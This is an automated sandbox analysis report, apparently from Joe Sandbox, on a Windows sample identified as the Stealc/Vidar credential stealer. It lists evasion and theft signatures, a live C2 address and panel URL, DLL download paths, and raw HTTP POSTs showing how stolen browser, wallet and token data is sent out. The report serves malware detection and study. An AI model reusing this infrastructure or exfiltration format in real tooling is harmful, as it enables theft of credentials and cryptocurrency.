Windows Analysis Report
h4ZgewNxoj.exe

Overview

General Information

Sample name: h4ZgewNxoj.exe
Renamed because the original name is a hash value
Original sample name: b7c3785aa2b9f10fc77bf33df04b2845d06d0ccfefd9df2af598f7ac0cf99f17.exe
Analysis ID: 1599299
MD5: 470aa1549c4266690a1a8d6d921017f9
SHA1: 57359f54841f8d0a4ae15fa53e9eb3dca725fa36
SHA256: b7c3785aa2b9f10fc77bf33df04b2845d06d0ccfefd9df2af598f7ac0cf99f17
Tags: exeuser-Bastian455_

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

[Classification chart: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious]
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: h4ZgewNxoj.exe Avira: detected
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllb Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll$ Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpfox Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dlla Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpSxS Avira URL Cloud: Label: malware
Source: http://185.215.113.206/tem Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllY Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllO Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dlle Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllS Avira URL Cloud: Label: malware
Source: 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: h4ZgewNxoj.exe Virustotal: Detection: 41%
Source: h4ZgewNxoj.exe ReversingLabs: Detection: 71%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: h4ZgewNxoj.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C4E6C80
Source: h4ZgewNxoj.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49932 version: TLS 1.0
Source: Binary string: mozglue.pdbP source: h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: h4ZgewNxoj.exe, 00000000.00000002.2474085998.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Sat, 25 Jan 2025 14:44:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Sat, 25 Jan 2025 14:44:29 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Sat, 25 Jan 2025 14:44:30 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Sat, 25 Jan 2025 14:44:32 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Sat, 25 Jan 2025 14:44:32 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Sat, 25 Jan 2025 14:44:34 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Sat, 25 Jan 2025 14:44:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="hwid"5E02BF885D872556134559------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="build"brat------CGDBFBGIDHCAAKEBAKFI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="message"browsers------AKKKECBKKECGCAAAEHJK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="message"plugins------CFCFCAAAAFBAKEBFBAKK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="message"fplugins------FHIDAFHCBAKFCAAKFCFC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.215.113.206Content-Length: 6419Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 185.215.113.206Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="file"------JJEGIJEGDBFHDGCAFCAE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHCFBAKFBGDGDHJKJJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------FIDHCFBAKFBGDGDHJKJJContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------FIDHCFBAKFBGDGDHJKJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIDHCFBAKFBGDGDHJKJJContent-Disposition: form-data; name="file"------FIDHCFBAKFBGDGDHJKJJ--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="message"wallets------IECAFHDBGHJKFIDHJJJE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="message"files------FHCGHJDBFIIDGDHIJDBG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file"------AAEBAFBGIDHCBFHIECFC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBKHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="message"ybncbhylepme------GIJJKFCGDGHDHIECGCBK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IDGHDGIDAKEBAAKFCGHC--
Source: Joe Sandbox View IP Address: 239.255.255.250
Source: Joe Sandbox View IP Address: 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49822 -> 185.215.113.206:80
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49932 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 905sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.1
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000774000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000857000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dlle
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll$
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllS
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dlla
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllY
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllO
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllb
Source: h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
Source: h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000774000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpSxS
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpZ
